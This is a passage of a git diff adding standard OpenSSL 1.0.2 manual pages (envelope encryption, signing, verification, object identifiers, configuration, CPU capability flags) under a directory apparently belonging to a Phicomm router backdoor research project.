+L<EVP_PKEY_sign(3)|EVP_PKEY_sign(3)>,
+L<EVP_PKEY_verify_recover(3)|EVP_PKEY_verify_recover(3)>,
+L<EVP_PKEY_derive(3)|EVP_PKEY_derive(3)> 
+
+=head1 HISTORY
+
+These functions were first added to OpenSSL 1.0.0.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_PKEY_verify_recover.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_PKEY_verify_recover.pod
new file mode 100644
index 0000000..23a28a9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_PKEY_verify_recover.pod
@@ -0,0 +1,103 @@
+=pod
+
+=head1 NAME
+
+EVP_PKEY_verify_recover_init, EVP_PKEY_verify_recover - recover signature using a public key algorithm
+
+=head1 SYNOPSIS
+
+ #include <openssl/evp.h>
+
+ int EVP_PKEY_verify_recover_init(EVP_PKEY_CTX *ctx);
+ int EVP_PKEY_verify_recover(EVP_PKEY_CTX *ctx,
+			unsigned char *rout, size_t *routlen,
+			const unsigned char *sig, size_t siglen);
+
+=head1 DESCRIPTION
+
+The EVP_PKEY_verify_recover_init() function initializes a public key algorithm
+context using key B<pkey> for a verify recover operation.
+
+The EVP_PKEY_verify_recover() function recovers signed data
+using B<ctx>. The signature is specified using the B<sig> and
+B<siglen> parameters. If B<rout> is B<NULL> then the maximum size of the output
+buffer is written to the B<routlen> parameter. If B<rout> is not B<NULL> then
+before the call the B<routlen> parameter should contain the length of the
+B<rout> buffer, if the call is successful recovered data is written to
+B<rout> and the amount of data written to B<routlen>.
+
+=head1 NOTES
+
+Normally an application is only interested in whether a signature verification
+operation is successful in those cases the EVP_verify() function should be 
+used.
+
+Sometimes however it is useful to obtain the data originally signed using a
+signing operation. Only certain public key algorithms can recover a signature
+in this way (for example RSA in PKCS padding mode).
+
+After the call to EVP_PKEY_verify_recover_init() algorithm specific control
+operations can be performed to set any appropriate parameters for the
+operation.
+
+The function EVP_PKEY_verify_recover() can be called more than once on the same
+context if several operations are performed using the same parameters.
+
+=head1 RETURN VALUES
+
+EVP_PKEY_verify_recover_init() and EVP_PKEY_verify_recover() return 1 for success
+and 0 or a negative value for failure. In particular a return value of -2
+indicates the operation is not supported by the public key algorithm.
+
+=head1 EXAMPLE
+
+Recover digest originally signed using PKCS#1 and SHA256 digest:
+
+ #include <openssl/evp.h>
+ #include <openssl/rsa.h>
+
+ EVP_PKEY_CTX *ctx;
+ unsigned char *rout, *sig;
+ size_t routlen, siglen; 
+ EVP_PKEY *verify_key;
+ /* NB: assumes verify_key, sig and siglen are already set up
+  * and that verify_key is an RSA public key
+  */
+ ctx = EVP_PKEY_CTX_new(verify_key);
+ if (!ctx)
+	/* Error occurred */
+ if (EVP_PKEY_verify_recover_init(ctx) <= 0)
+	/* Error */
+ if (EVP_PKEY_CTX_set_rsa_padding(ctx, RSA_PKCS1_PADDING) <= 0)
+	/* Error */
+ if (EVP_PKEY_CTX_set_signature_md(ctx, EVP_sha256()) <= 0)
+	/* Error */
+
+ /* Determine buffer length */
+ if (EVP_PKEY_verify_recover(ctx, NULL, &routlen, sig, siglen) <= 0)
+	/* Error */
+
+ rout = OPENSSL_malloc(routlen);
+
+ if (!rout)
+	/* malloc failure */
+ 
+ if (EVP_PKEY_verify_recover(ctx, rout, &routlen, sig, siglen) <= 0)
+	/* Error */
+
+ /* Recovered data is routlen bytes written to buffer rout */
+
+=head1 SEE ALSO
+
+L<EVP_PKEY_CTX_new(3)|EVP_PKEY_CTX_new(3)>,
+L<EVP_PKEY_encrypt(3)|EVP_PKEY_encrypt(3)>,
+L<EVP_PKEY_decrypt(3)|EVP_PKEY_decrypt(3)>,
+L<EVP_PKEY_sign(3)|EVP_PKEY_sign(3)>,
+L<EVP_PKEY_verify(3)|EVP_PKEY_verify(3)>,
+L<EVP_PKEY_derive(3)|EVP_PKEY_derive(3)> 
+
+=head1 HISTORY
+
+These functions were first added to OpenSSL 1.0.0.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_SealInit.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_SealInit.pod
new file mode 100644
index 0000000..7d793e1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_SealInit.pod
@@ -0,0 +1,85 @@
+=pod
+
+=head1 NAME
+
+EVP_SealInit, EVP_SealUpdate, EVP_SealFinal - EVP envelope encryption
+
+=head1 SYNOPSIS
+
+ #include <openssl/evp.h>
+
+ int EVP_SealInit(EVP_CIPHER_CTX *ctx, const EVP_CIPHER *type,
+                  unsigned char **ek, int *ekl, unsigned char *iv,
+                  EVP_PKEY **pubk, int npubk);
+ int EVP_SealUpdate(EVP_CIPHER_CTX *ctx, unsigned char *out,
+         int *outl, unsigned char *in, int inl);
+ int EVP_SealFinal(EVP_CIPHER_CTX *ctx, unsigned char *out,
+         int *outl);
+
+=head1 DESCRIPTION
+
+The EVP envelope routines are a high level interface to envelope
+encryption. They generate a random key and IV (if required) then
+"envelope" it by using public key encryption. Data can then be
+encrypted using this key.
+
+EVP_SealInit() initializes a cipher context B<ctx> for encryption
+with cipher B<type> using a random secret key and IV. B<type> is normally
+supplied by a function such as EVP_des_cbc(). The secret key is encrypted
+using one or more public keys, this allows the same encrypted data to be
+decrypted using any of the corresponding private keys. B<ek> is an array of
+buffers where the public key encrypted secret key will be written, each buffer
+must contain enough room for the corresponding encrypted key: that is
+B<ek[i]> must have room for B<EVP_PKEY_size(pubk[i])> bytes. The actual
+size of each encrypted secret key is written to the array B<ekl>. B<pubk> is
+an array of B<npubk> public keys.
+
+The B<iv> parameter is a buffer where the generated IV is written to. It must
+contain enough room for the corresponding cipher's IV, as determined by (for
+example) EVP_CIPHER_iv_length(type).
+
+If the cipher does not require an IV then the B<iv> parameter is ignored
+and can be B<NULL>.
+
+EVP_SealUpdate() and EVP_SealFinal() have exactly the same properties
+as the EVP_EncryptUpdate() and EVP_EncryptFinal() routines, as 
+documented on the L<EVP_EncryptInit(3)|EVP_EncryptInit(3)> manual
+page. 
+
+=head1 RETURN VALUES
+
+EVP_SealInit() returns 0 on error or B<npubk> if successful.
+
+EVP_SealUpdate() and EVP_SealFinal() return 1 for success and 0 for
+failure.
+
+=head1 NOTES
+
+Because a random secret key is generated the random number generator
+must be seeded before calling EVP_SealInit().
+
+The public key must be RSA because it is the only OpenSSL public key
+algorithm that supports key transport.
+
+Envelope encryption is the usual method of using public key encryption
+on large amounts of data, this is because public key encryption is slow
+but symmetric encryption is fast. So symmetric encryption is used for
+bulk encryption and the small random symmetric key used is transferred
+using public key encryption.
+
+It is possible to call EVP_SealInit() twice in the same way as
+EVP_EncryptInit(). The first call should have B<npubk> set to 0
+and (after setting any cipher parameters) it should be called again
+with B<type> set to NULL.
+
+=head1 SEE ALSO
+
+L<evp(3)|evp(3)>, L<rand(3)|rand(3)>,
+L<EVP_EncryptInit(3)|EVP_EncryptInit(3)>,
+L<EVP_OpenInit(3)|EVP_OpenInit(3)>
+
+=head1 HISTORY
+
+EVP_SealFinal() did not return a value before OpenSSL 0.9.7.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_SignInit.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_SignInit.pod
new file mode 100644
index 0000000..14ecc77
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_SignInit.pod
@@ -0,0 +1,106 @@
+=pod
+
+=head1 NAME
+
+EVP_SignInit, EVP_SignUpdate, EVP_SignFinal - EVP signing functions
+
+=head1 SYNOPSIS
+
+ #include <openssl/evp.h>
+
+ int EVP_SignInit_ex(EVP_MD_CTX *ctx, const EVP_MD *type, ENGINE *impl);
+ int EVP_SignUpdate(EVP_MD_CTX *ctx, const void *d, unsigned int cnt);
+ int EVP_SignFinal(EVP_MD_CTX *ctx,unsigned char *sig,unsigned int *s, EVP_PKEY *pkey);
+
+ void EVP_SignInit(EVP_MD_CTX *ctx, const EVP_MD *type);
+
+ int EVP_PKEY_size(EVP_PKEY *pkey);
+
+=head1 DESCRIPTION
+
+The EVP signature routines are a high level interface to digital
+signatures.
+
+EVP_SignInit_ex() sets up signing context B<ctx> to use digest
+B<type> from ENGINE B<impl>. B<ctx> must be initialized with
+EVP_MD_CTX_init() before calling this function.
+
+EVP_SignUpdate() hashes B<cnt> bytes of data at B<d> into the
+signature context B<ctx>. This function can be called several times on the
+same B<ctx> to include additional data.
+
+EVP_SignFinal() signs the data in B<ctx> using the private key B<pkey> and
+places the signature in B<sig>. B<sig> must be at least EVP_PKEY_size(pkey)
+bytes in size. B<s> is an OUT paramter, and not used as an IN parameter.
+The number of bytes of data written (i.e. the length of the signature)
+will be written to the integer at B<s>, at most EVP_PKEY_size(pkey) bytes
+will be written.
+
+EVP_SignInit() initializes a signing context B<ctx> to use the default
+implementation of digest B<type>.
+
+EVP_PKEY_size() returns the maximum size of a signature in bytes. The actual
+signature returned by EVP_SignFinal() may be smaller.
+
+=head1 RETURN VALUES
+
+EVP_SignInit_ex(), EVP_SignUpdate() and EVP_SignFinal() return 1
+for success and 0 for failure.
+
+EVP_PKEY_size() returns the maximum size of a signature in bytes.
+
+The error codes can be obtained by L<ERR_get_error(3)|ERR_get_error(3)>.
+
+=head1 NOTES
+
+The B<EVP> interface to digital signatures should almost always be used in
+preference to the low level interfaces. This is because the code then becomes
+transparent to the algorithm used and much more flexible.
+
+Due to the link between message digests and public key algorithms the correct
+digest algorithm must be used with the correct public key type. A list of
+algorithms and associated public key algorithms appears in 
+L<EVP_DigestInit(3)|EVP_DigestInit(3)>.
+
+When signing with DSA private keys the random number generator must be seeded
+or the operation will fail. The random number generator does not need to be
+seeded for RSA signatures.
+
+The call to EVP_SignFinal() internally finalizes a copy of the digest context.
+This means that calls to EVP_SignUpdate() and EVP_SignFinal() can be called
+later to digest and sign additional data.
+
+Since only a copy of the digest context is ever finalized the context must
+be cleaned up after use by calling EVP_MD_CTX_cleanup() or a memory leak
+will occur.
+
+=head1 BUGS
+
+Older versions of this documentation wrongly stated that calls to 
+EVP_SignUpdate() could not be made after calling EVP_SignFinal().
+
+Since the private key is passed in the call to EVP_SignFinal() any error
+relating to the private key (for example an unsuitable key and digest
+combination) will not be indicated until after potentially large amounts of
+data have been passed through EVP_SignUpdate().
+
+It is not possible to change the signing parameters using these function.
+
+The previous two bugs are fixed in the newer EVP_SignDigest*() function.
+
+=head1 SEE ALSO
+
+L<EVP_VerifyInit(3)|EVP_VerifyInit(3)>,
+L<EVP_DigestInit(3)|EVP_DigestInit(3)>, L<err(3)|err(3)>,
+L<evp(3)|evp(3)>, L<hmac(3)|hmac(3)>, L<md2(3)|md2(3)>,
+L<md5(3)|md5(3)>, L<mdc2(3)|mdc2(3)>, L<ripemd(3)|ripemd(3)>,
+L<sha(3)|sha(3)>, L<dgst(1)|dgst(1)>
+
+=head1 HISTORY
+
+EVP_SignInit(), EVP_SignUpdate() and EVP_SignFinal() are
+available in all versions of SSLeay and OpenSSL.
+
+EVP_SignInit_ex() was added in OpenSSL 0.9.7.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_VerifyInit.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_VerifyInit.pod
new file mode 100644
index 0000000..9097f09
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_VerifyInit.pod
@@ -0,0 +1,95 @@
+=pod
+
+=head1 NAME
+
+EVP_VerifyInit, EVP_VerifyUpdate, EVP_VerifyFinal - EVP signature verification functions
+
+=head1 SYNOPSIS
+
+ #include <openssl/evp.h>
+
+ int EVP_VerifyInit_ex(EVP_MD_CTX *ctx, const EVP_MD *type, ENGINE *impl);
+ int EVP_VerifyUpdate(EVP_MD_CTX *ctx, const void *d, unsigned int cnt);
+ int EVP_VerifyFinal(EVP_MD_CTX *ctx,unsigned char *sigbuf, unsigned int siglen,EVP_PKEY *pkey);
+
+ int EVP_VerifyInit(EVP_MD_CTX *ctx, const EVP_MD *type);
+
+=head1 DESCRIPTION
+
+The EVP signature verification routines are a high level interface to digital
+signatures.
+
+EVP_VerifyInit_ex() sets up verification context B<ctx> to use digest
+B<type> from ENGINE B<impl>. B<ctx> must be initialized by calling
+EVP_MD_CTX_init() before calling this function.
+
+EVP_VerifyUpdate() hashes B<cnt> bytes of data at B<d> into the
+verification context B<ctx>. This function can be called several times on the
+same B<ctx> to include additional data.
+
+EVP_VerifyFinal() verifies the data in B<ctx> using the public key B<pkey>
+and against the B<siglen> bytes at B<sigbuf>.
+
+EVP_VerifyInit() initializes verification context B<ctx> to use the default
+implementation of digest B<type>.
+
+=head1 RETURN VALUES
+
+EVP_VerifyInit_ex() and EVP_VerifyUpdate() return 1 for success and 0 for
+failure.
+
+EVP_VerifyFinal() returns 1 for a correct signature, 0 for failure and -1 if some
+other error occurred.
+
+The error codes can be obtained by L<ERR_get_error(3)|ERR_get_error(3)>.
+
+=head1 NOTES
+
+The B<EVP> interface to digital signatures should almost always be used in
+preference to the low level interfaces. This is because the code then becomes
+transparent to the algorithm used and much more flexible.
+
+Due to the link between message digests and public key algorithms the correct
+digest algorithm must be used with the correct public key type. A list of
+algorithms and associated public key algorithms appears in 
+L<EVP_DigestInit(3)|EVP_DigestInit(3)>.
+
+The call to EVP_VerifyFinal() internally finalizes a copy of the digest context.
+This means that calls to EVP_VerifyUpdate() and EVP_VerifyFinal() can be called
+later to digest and verify additional data.
+
+Since only a copy of the digest context is ever finalized the context must
+be cleaned up after use by calling EVP_MD_CTX_cleanup() or a memory leak
+will occur.
+
+=head1 BUGS
+
+Older versions of this documentation wrongly stated that calls to 
+EVP_VerifyUpdate() could not be made after calling EVP_VerifyFinal().
+
+Since the public key is passed in the call to EVP_SignFinal() any error
+relating to the private key (for example an unsuitable key and digest
+combination) will not be indicated until after potentially large amounts of
+data have been passed through EVP_SignUpdate().
+
+It is not possible to change the signing parameters using these function.
+
+The previous two bugs are fixed in the newer EVP_VerifyDigest*() function.
+
+=head1 SEE ALSO
+
+L<evp(3)|evp(3)>,
+L<EVP_SignInit(3)|EVP_SignInit(3)>,
+L<EVP_DigestInit(3)|EVP_DigestInit(3)>, L<err(3)|err(3)>,
+L<evp(3)|evp(3)>, L<hmac(3)|hmac(3)>, L<md2(3)|md2(3)>,
+L<md5(3)|md5(3)>, L<mdc2(3)|mdc2(3)>, L<ripemd(3)|ripemd(3)>,
+L<sha(3)|sha(3)>, L<dgst(1)|dgst(1)>
+
+=head1 HISTORY
+
+EVP_VerifyInit(), EVP_VerifyUpdate() and EVP_VerifyFinal() are
+available in all versions of SSLeay and OpenSSL.
+
+EVP_VerifyInit_ex() was added in OpenSSL 0.9.7
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/OBJ_nid2obj.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/OBJ_nid2obj.pod
new file mode 100644
index 0000000..1e45dd4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/OBJ_nid2obj.pod
@@ -0,0 +1,151 @@
+=pod
+
+=head1 NAME
+
+OBJ_nid2obj, OBJ_nid2ln, OBJ_nid2sn, OBJ_obj2nid, OBJ_txt2nid, OBJ_ln2nid, OBJ_sn2nid,
+OBJ_cmp, OBJ_dup, OBJ_txt2obj, OBJ_obj2txt, OBJ_create, OBJ_cleanup - ASN1 object utility
+functions
+
+=head1 SYNOPSIS
+
+ #include <openssl/objects.h>
+
+ ASN1_OBJECT * OBJ_nid2obj(int n);
+ const char *  OBJ_nid2ln(int n);
+ const char *  OBJ_nid2sn(int n);
+
+ int OBJ_obj2nid(const ASN1_OBJECT *o);
+ int OBJ_ln2nid(const char *ln);
+ int OBJ_sn2nid(const char *sn);
+
+ int OBJ_txt2nid(const char *s);
+
+ ASN1_OBJECT * OBJ_txt2obj(const char *s, int no_name);
+ int OBJ_obj2txt(char *buf, int buf_len, const ASN1_OBJECT *a, int no_name);
+
+ int OBJ_cmp(const ASN1_OBJECT *a,const ASN1_OBJECT *b);
+ ASN1_OBJECT * OBJ_dup(const ASN1_OBJECT *o);
+
+ int OBJ_create(const char *oid,const char *sn,const char *ln);
+ void OBJ_cleanup(void);
+
+=head1 DESCRIPTION
+
+The ASN1 object utility functions process ASN1_OBJECT structures which are
+a representation of the ASN1 OBJECT IDENTIFIER (OID) type.
+
+OBJ_nid2obj(), OBJ_nid2ln() and OBJ_nid2sn() convert the NID B<n> to 
+an ASN1_OBJECT structure, its long name and its short name respectively,
+or B<NULL> is an error occurred.
+
+OBJ_obj2nid(), OBJ_ln2nid(), OBJ_sn2nid() return the corresponding NID
+for the object B<o>, the long name <ln> or the short name <sn> respectively
+or NID_undef if an error occurred.
+
+OBJ_txt2nid() returns NID corresponding to text string <s>. B<s> can be
+a long name, a short name or the numerical respresentation of an object.
+
+OBJ_txt2obj() converts the text string B<s> into an ASN1_OBJECT structure.
+If B<no_name> is 0 then long names and short names will be interpreted
+as well as numerical forms. If B<no_name> is 1 only the numerical form
+is acceptable.
+
+OBJ_obj2txt() converts the B<ASN1_OBJECT> B<a> into a textual representation.
+The representation is written as a null terminated string to B<buf>
+at most B<buf_len> bytes are written, truncating the result if necessary.
+The total amount of space required is returned. If B<no_name> is 0 then
+if the object has a long or short name then that will be used, otherwise
+the numerical form will be used. If B<no_name> is 1 then the numerical
+form will always be used.
+
+OBJ_cmp() compares B<a> to B<b>. If the two are identical 0 is returned.
+
+OBJ_dup() returns a copy of B<o>.
+
+OBJ_create() adds a new object to the internal table. B<oid> is the 
+numerical form of the object, B<sn> the short name and B<ln> the
+long name. A new NID is returned for the created object.
+
+OBJ_cleanup() cleans up OpenSSLs internal object table: this should
+be called before an application exits if any new objects were added
+using OBJ_create().
+
+=head1 NOTES
+
+Objects in OpenSSL can have a short name, a long name and a numerical
+identifier (NID) associated with them. A standard set of objects is
+represented in an internal table. The appropriate values are defined
+in the header file B<objects.h>.
+
+For example the OID for commonName has the following definitions:
+
+ #define SN_commonName                   "CN"
+ #define LN_commonName                   "commonName"
+ #define NID_commonName                  13
+
+New objects can be added by calling OBJ_create().
+
+Table objects have certain advantages over other objects: for example
+their NIDs can be used in a C language switch statement. They are
+also static constant structures which are shared: that is there
+is only a single constant structure for each table object.
+
+Objects which are not in the table have the NID value NID_undef.
+
+Objects do not need to be in the internal tables to be processed,
+the functions OBJ_txt2obj() and OBJ_obj2txt() can process the numerical
+form of an OID.
+
+=head1 EXAMPLES
+
+Create an object for B<commonName>:
+
+ ASN1_OBJECT *o;
+ o = OBJ_nid2obj(NID_commonName);
+
+Check if an object is B<commonName>
+
+ if (OBJ_obj2nid(obj) == NID_commonName)
+	/* Do something */
+
+Create a new NID and initialize an object from it:
+
+ int new_nid;
+ ASN1_OBJECT *obj;
+ new_nid = OBJ_create("1.2.3.4", "NewOID", "New Object Identifier");
+
+ obj = OBJ_nid2obj(new_nid);
+ 
+Create a new object directly:
+
+ obj = OBJ_txt2obj("1.2.3.4", 1);
+
+=head1 BUGS
+
+OBJ_obj2txt() is awkward and messy to use: it doesn't follow the 
+convention of other OpenSSL functions where the buffer can be set
+to B<NULL> to determine the amount of data that should be written.
+Instead B<buf> must point to a valid buffer and B<buf_len> should
+be set to a positive value. A buffer length of 80 should be more
+than enough to handle any OID encountered in practice.
+
+=head1 RETURN VALUES
+
+OBJ_nid2obj() returns an B<ASN1_OBJECT> structure or B<NULL> is an
+error occurred.
+
+OBJ_nid2ln() and OBJ_nid2sn() returns a valid string or B<NULL>
+on error.
+
+OBJ_obj2nid(), OBJ_ln2nid(), OBJ_sn2nid() and OBJ_txt2nid() return
+a NID or B<NID_undef> on error.
+
+=head1 SEE ALSO
+
+L<ERR_get_error(3)|ERR_get_error(3)>
+
+=head1 HISTORY
+
+TBA
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/OPENSSL_Applink.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/OPENSSL_Applink.pod
new file mode 100644
index 0000000..e54de12
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/OPENSSL_Applink.pod
@@ -0,0 +1,21 @@
+=pod
+
+=head1 NAME
+
+OPENSSL_Applink - glue between OpenSSL BIO and Win32 compiler run-time
+
+=head1 SYNOPSIS
+
+ __declspec(dllexport) void **OPENSSL_Applink();
+
+=head1 DESCRIPTION
+
+OPENSSL_Applink is application-side interface which provides a glue
+between OpenSSL BIO layer and Win32 compiler run-time environment.
+Even though it appears at application side, it's essentially OpenSSL
+private interface. For this reason application developers are not
+expected to implement it, but to compile provided module with
+compiler of their choice and link it into the target application.
+The referred module is available as <openssl>/ms/applink.c.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/OPENSSL_VERSION_NUMBER.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/OPENSSL_VERSION_NUMBER.pod
new file mode 100644
index 0000000..f7ca7cb
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/OPENSSL_VERSION_NUMBER.pod
@@ -0,0 +1,101 @@
+=pod
+
+=head1 NAME
+
+OPENSSL_VERSION_NUMBER, SSLeay, SSLeay_version - get OpenSSL version number
+
+=head1 SYNOPSIS
+
+ #include <openssl/opensslv.h>
+ #define OPENSSL_VERSION_NUMBER 0xnnnnnnnnnL
+
+ #include <openssl/crypto.h>
+ long SSLeay(void);
+ const char *SSLeay_version(int t);
+
+=head1 DESCRIPTION
+
+OPENSSL_VERSION_NUMBER is a numeric release version identifier:
+
+ MNNFFPPS: major minor fix patch status
+
+The status nibble has one of the values 0 for development, 1 to e for betas
+1 to 14, and f for release.
+
+for example
+
+ 0x000906000 == 0.9.6 dev
+ 0x000906023 == 0.9.6b beta 3
+ 0x00090605f == 0.9.6e release
+
+Versions prior to 0.9.3 have identifiers E<lt> 0x0930.
+Versions between 0.9.3 and 0.9.5 had a version identifier with this
+interpretation:
+
+ MMNNFFRBB major minor fix final beta/patch
+
+for example
+
+ 0x000904100 == 0.9.4 release
+ 0x000905000 == 0.9.5 dev
+
+Version 0.9.5a had an interim interpretation that is like the current one,
+except the patch level got the highest bit set, to keep continuity.  The
+number was therefore 0x0090581f.
+
+
+For backward compatibility, SSLEAY_VERSION_NUMBER is also defined.
+
+SSLeay() returns this number. The return value can be compared to the
+macro to make sure that the correct version of the library has been
+loaded, especially when using DLLs on Windows systems.
+
+SSLeay_version() returns different strings depending on B<t>:
+
+=over 4
+
+=item SSLEAY_VERSION
+
+The text variant of the version number and the release date.  For example,
+"OpenSSL 0.9.5a 1 Apr 2000".
+
+=item SSLEAY_CFLAGS
+
+The compiler flags set for the compilation process in the form
+"compiler: ..."  if available or "compiler: information not available"
+otherwise.
+
+=item SSLEAY_BUILT_ON
+
+The date of the build process in the form "built on: ..." if available
+or "built on: date not available" otherwise.
+
+=item SSLEAY_PLATFORM
+
+The "Configure" target of the library build in the form "platform: ..."
+if available or "platform: information not available" otherwise.
+
+=item SSLEAY_DIR
+
+The "OPENSSLDIR" setting of the library build in the form "OPENSSLDIR: "...""
+if available or "OPENSSLDIR: N/A" otherwise.
+
+=back
+
+For an unknown B<t>, the text "not available" is returned.
+
+=head1 RETURN VALUE
+
+The version number.
+
+=head1 SEE ALSO
+
+L<crypto(3)|crypto(3)>
+
+=head1 HISTORY
+
+SSLeay() and SSLEAY_VERSION_NUMBER are available in all versions of SSLeay and OpenSSL.
+OPENSSL_VERSION_NUMBER is available in all versions of OpenSSL.
+B<SSLEAY_DIR> was added in OpenSSL 0.9.7.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/OPENSSL_config.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/OPENSSL_config.pod
new file mode 100644
index 0000000..888de88
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/OPENSSL_config.pod
@@ -0,0 +1,82 @@
+=pod
+
+=head1 NAME
+
+OPENSSL_config, OPENSSL_no_config - simple OpenSSL configuration functions
+
+=head1 SYNOPSIS
+
+ #include <openssl/conf.h>
+
+ void OPENSSL_config(const char *config_name);
+ void OPENSSL_no_config(void);
+
+=head1 DESCRIPTION
+
+OPENSSL_config() configures OpenSSL using the standard B<openssl.cnf>
+configuration file name using B<config_name>. If B<config_name> is NULL then
+the default name B<openssl_conf> will be used. Any errors are ignored. Further
+calls to OPENSSL_config() will have no effect. The configuration file format
+is documented in the L<conf(5)|conf(5)> manual page.
+
+OPENSSL_no_config() disables configuration. If called before OPENSSL_config()
+no configuration takes place.
+
+=head1 NOTES
+
+It is B<strongly> recommended that B<all> new applications call OPENSSL_config()
+or the more sophisticated functions such as CONF_modules_load() during
+initialization (that is before starting any threads). By doing this
+an application does not need to keep track of all configuration options
+and some new functionality can be supported automatically.
+
+It is also possible to automatically call OPENSSL_config() when an application
+calls OPENSSL_add_all_algorithms() by compiling an application with the
+preprocessor symbol B<OPENSSL_LOAD_CONF> #define'd. In this way configuration
+can be added without source changes.
+
+The environment variable B<OPENSSL_CONF> can be set to specify the location
+of the configuration file.
+ 
+Currently ASN1 OBJECTs and ENGINE configuration can be performed future
+versions of OpenSSL will add new configuration options.
+
+There are several reasons why calling the OpenSSL configuration routines is
+advisable. For example new ENGINE functionality was added to OpenSSL 0.9.7.
+In OpenSSL 0.9.7 control functions can be supported by ENGINEs, this can be
+used (among other things) to load dynamic ENGINEs from shared libraries (DSOs).
+However very few applications currently support the control interface and so
+very few can load and use dynamic ENGINEs. Equally in future more sophisticated
+ENGINEs will require certain control operations to customize them. If an
+application calls OPENSSL_config() it doesn't need to know or care about
+ENGINE control operations because they can be performed by editing a
+configuration file.
+
+Applications should free up configuration at application closedown by calling
+CONF_modules_free().
+
+=head1 RESTRICTIONS
+
+The OPENSSL_config() function is designed to be a very simple "call it and
+forget it" function. As a result its behaviour is somewhat limited. It ignores
+all errors silently and it can only load from the standard configuration file
+location for example.
+
+It is however B<much> better than nothing. Applications which need finer
+control over their configuration functionality should use the configuration
+functions such as CONF_load_modules() directly.
+
+=head1 RETURN VALUES
+
+Neither OPENSSL_config() nor OPENSSL_no_config() return a value.
+
+=head1 SEE ALSO
+
+L<conf(5)|conf(5)>, L<CONF_load_modules_file(3)|CONF_load_modules_file(3)>,
+L<CONF_modules_free(3)|CONF_modules_free(3)>
+
+=head1 HISTORY
+
+OPENSSL_config() and OPENSSL_no_config() first appeared in OpenSSL 0.9.7
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/OPENSSL_ia32cap.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/OPENSSL_ia32cap.pod
new file mode 100644
index 0000000..90156d2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/OPENSSL_ia32cap.pod
@@ -0,0 +1,96 @@
+=pod
+
+=head1 NAME
+
+OPENSSL_ia32cap, OPENSSL_ia32cap_loc - the IA-32 processor capabilities vector
+
+=head1 SYNOPSIS
+
+ unsigned int *OPENSSL_ia32cap_loc(void);
+ #define OPENSSL_ia32cap ((OPENSSL_ia32cap_loc())[0])
+
+=head1 DESCRIPTION
+
+Value returned by OPENSSL_ia32cap_loc() is address of a variable
+containing IA-32 processor capabilities bit vector as it appears in
+EDX:ECX register pair after executing CPUID instruction with EAX=1
+input value (see Intel Application Note #241618). Naturally it's
+meaningful on x86 and x86_64 platforms only. The variable is normally
+set up automatically upon toolkit initialization, but can be
+manipulated afterwards to modify crypto library behaviour. For the
+moment of this writing following bits are significant:
+
+=over
+
+=item bit #4 denoting presence of Time-Stamp Counter.
+
+=item bit #19 denoting availability of CLFLUSH instruction;
+
+=item bit #20, reserved by Intel, is used to choose among RC4 code paths;
+
+=item bit #23 denoting MMX support;
+
+=item bit #24, FXSR bit, denoting availability of XMM registers;
+
+=item bit #25 denoting SSE support;
+
+=item bit #26 denoting SSE2 support;
+
+=item bit #28 denoting Hyperthreading, which is used to distinguish
+cores with shared cache;
+
+=item bit #30, reserved by Intel, denotes specifically Intel CPUs;
+
+=item bit #33 denoting availability of PCLMULQDQ instruction;
+
+=item bit #41 denoting SSSE3, Supplemental SSE3, support;
+
+=item bit #43 denoting AMD XOP support (forced to zero on non-AMD CPUs);
+
+=item bit #57 denoting AES-NI instruction set extension;
+
+=item bit #59, OSXSAVE bit, denoting availability of YMM registers;
+
+=item bit #60 denoting AVX extension;
+
+=item bit #62 denoting availability of RDRAND instruction;
+
+=back
+
+For example, clearing bit #26 at run-time disables high-performance
+SSE2 code present in the crypto library, while clearing bit #24
+disables SSE2 code operating on 128-bit XMM register bank. You might
+have to do the latter if target OpenSSL application is executed on SSE2
+capable CPU, but under control of OS that does not enable XMM
+registers. Even though you can manipulate the value programmatically,
+you most likely will find it more appropriate to set up an environment
+variable with the same name prior starting target application, e.g. on
